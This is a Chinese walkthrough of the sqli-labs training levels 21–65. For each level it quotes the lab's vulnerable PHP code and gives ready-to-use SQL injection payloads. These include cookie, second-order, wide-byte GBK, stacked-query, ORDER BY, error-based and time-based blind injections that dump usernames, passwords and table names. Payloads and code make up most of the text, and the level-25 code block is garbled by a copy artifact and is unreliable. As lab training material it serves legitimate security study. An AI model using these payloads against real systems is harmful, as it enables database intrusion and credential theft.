第二十一关:
cookie注入
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注: RHVtYg== 是 Dumb 经Base64加密后的值
和上关又是差不多 base64编码而已
payload:
') or 1=1 #
Jykgb3IgMT0xICM=
第二十二关:
闭合为双引号 参考21关.
第二十三关:
过滤了注释符号 而已
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
payload:
qing’ union select 1,group_concat(username),group_concat(password) from users where 1 or ‘1’ = ’
二十四关:
最简单的二次注入 没任何过滤
login.php:
发现输入进行了mysql_real_escape_string()函数转义 编码如果不是gbk宽字节注入 单引号是不能用了。
function sqllogin(){
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
$res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);
//print_r($row) ;
if ($row[1]) {
return $row[1];
} else {
return 0;
}
}
login_create.php:
//$username= $_POST['username'] ;
$username= mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);
echo "<font size='3' color='#FFFF00'>";
$sql = "select count(*) from users where username='$username'";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);
这里看到这里把username再次取出来查询的没有任何过滤 所以我们在插入username的就直接把注入的payload插到数据库里,取出来时候造成注入
admin’ or 1=1#
登录了admin’ or 1=1#这个账号 输入新密码qing
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
update的时候就把我们原先的admin’ or 1=1 #取出来拿到语句中了 所以密码都是qing了
第二十五关:
这关开始过滤
function blacklist($id){
$id= preg_replace(’/or/i’,"", $id);
$id= preg_replace(’/AND/i’,"", $id);
return $id;
}
i d = b l a c k l i s t ( id= blacklist( id=blacklist(id);
h i n t = hint= hint=id;
s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' sql="SELECT∗FROMusersWHEREid=′id’ LIMIT 0,1";
记得双写
payload:
http://127.0.0.1/Less-25/?id=1’ oorr ‘1’=‘1
http://127.0.0.1/Less-25/?id=qing’ union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=‘security’ --+
25a:
和25一样 没单引号而已
http://127.0.0.1/Less-25a/?id=-1 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=‘security’ --+
第二十六关:
这关过滤多一些 好耍一点
function blacklist($id) {
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
单引号闭合 过滤了 or,and , /* , – , # , 空格 , /
payload:
qing’%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0’1
%A0替代空格 &&替换and 注意url编码 需要linux 不测试了
26a:
多一个闭合括号 不多说
第二十七关:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
多一些过滤 关键字大小写就行了
payload:
0’%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0’1
27a:
function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}
闭合不一样而已
payload:
0"%A0or(1)=(1)%26%26%a0"1
http://127.0.0.1/Less27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema=‘security’%26%26%a0"1
http://127.0.0.1/Less-27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
第二十八关:
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
过滤union select这一个组合,也要过滤空格,所以采用union union select select方法绕过,空格照样用%0a替换
payload:
0’)%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
28a:
简单不多说
第二十九关:
加了一个很弱的"waf…"
if(isset($_GET['id']))
{
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
//echo $id1;
whitelist($id1);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{
$match = preg_match("/^\d+$/", $input);
if($match)
{
//echo "you are good";
//return $match;
}
else
{
header('Location: hacked.php');
//echo "you are bad";
}
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value)
{
$val=substr($value,0,2);
if($val=="id")
{
$id_value=substr($value,3,30);
return $id_value;
echo "<br>";
break;
}
}
}
?>
注入方法就是参数污染
例子 显示的是id=2的内容 但是waf检测的是前面id=1的内容 好理解吧?
payload:
http://sqli-qing.cn/sqli/Less-29/?id=’ union select 1,version(),database() --+
http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
第三十关:
同上
第三十一关:
同上
第三十二关:
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
...
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
...
function strToHex($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";
简单说check_addslashes函数把\ 单引号 双引号都进行过滤转义
明显的编码gbk 宽字节注入 不用多说
payload:
http://127.0.0.1/Less-32/?id=-1%df%27 UNion seleCt 1,2,DATABASE()–+
第33-34关:
同上
第三十五关:
// take the variables
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
...
// connectivity
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
id没有被单引号括起来所以addslashes起不到作用
正常各种payload即可:
http://127.0.0.1i/Less-35/?id=-1x and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
第三十六关:
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
// take the variables
if(isset($_GET['id']))
{
$id=check_quotes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
mysql_real_escape_string转义 还是一样不多说
第三十七关:
post登录的而已
uname=admin%df%27 or 1=2 union select 1,database()#
第三十八关:
堆叠注入 来看看
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
/* store first result set */
if ($result = mysqli_store_result($con1))
{
if($row = mysqli_fetch_row($result))
{
echo '<font size = "5" color= "#00FF00">';
printf("Your Username is : %s", $row[1]);
echo "<br>";
printf("Your Password is : %s", $row[2]);
echo "<br>";
echo "</font>";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
//printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
/* close connection */
mysqli_close($con1);
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。(有这个才能进行堆叠)
分号我们可以加入注入的新的语句
payload:
http://sqli-qing.cn/sqli/Less-38/?id=2%FE’ or 1=1 %23
http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23
http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
39-43:
参考38即可。
42关还是堆叠
qing’;creat table me like users
43关闭合为’)
第44关:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
payload:
login_user=admin&login_password=1’ or ‘1’='1&mysubmit=login
第45关:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
}
}
}
第46关:
到了order by注入 来看看哈
$id=$_GET['sort'];
if(isset($id))
{
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'SORT:'.$id."\n");
fclose($fp);
$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
http://127.0.0.1/Less-46/?sort=1+asc
http://127.0.0.1/Less-46/?sort=1+desc
说下order by可以哪些方法注入
首先报错注入
http://sqli-qing.cn/sqli/Less-46/?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));
还可以盲注 可以用到异或注入 这里布尔盲注
id ^(select(select version()) regexp ‘^5’)
http://127.0.0.1/Less-46/?sort=1 ^(select(select version()) regexp ‘^5’)
稍微提一下:
regexp正则匹配的时候,如果匹配到数据返回1(00000001)的时候,此时的1会和id中的数据的二进制进行异或,按照异或的结果进行升序排列,所以显示的排列会发生变化;反之当进行正则匹配的时候,未匹配到数据返回0(00000000),此时数字和0异或的结果还是本身,所以显示的排列不会发生改变。
时间盲注也可以
http://127.0.0.1/Less-46/?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))
order by 也可以union 联合查询
order by id ) union(select 1,(version()),3)
有个条件前面得有个( ctf有 实战没遇到过
第47-48关:
参考46关即可。
第49关:
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
while ($row = mysql_fetch_assoc($result)){
echo $row['username'];
echo $row['password'];
}
}
第50-53关:
均可参考46关。
第54关:
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
...
$key = addslashes($_POST['key']);
$key = mysql_real_escape_string($key);
//echo $key;
//Query table to verify your result
$sql="SELECT 1 FROM $table WHERE $col1= '$key'";
//echo "$sql";
$result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
$row = mysql_fetch_array($result);
payload:
http://127.0.0.1/Less-54/?id=0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges’ --+
http://127.0.0.1/Less-54/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='qing' --+
http://127.0.0.1/Less-54/?id=0' union select 1,group_concat(secret_qing),group_concat(sessid) from challenges.qing --+
首先知道库名 challenges
查询表名
http://127.0.0.1/Less-54/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges’–+
列名和剩下的
id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘842yxlmx7h’–+
http://127.0.0.1/Less-54/?id=-1’union select 1,2,group_concat(secret_KOB8) from challenges.842yxlmx7h–+
第55-57关:
大同54
第58关:
同54有一点区别而已 这关开始不返回数据库查询内容 不能union select 那就报错
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘7mu71b84nt’),0x7e))
第59-60关:
同58
第61关:
-1’)) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+
第62关:
这里union注入和报错注入都不行
盲注 不多说
)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+
第63-65关:
同62
所有关卡就到此结束了,啦啦啦🤭
256
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
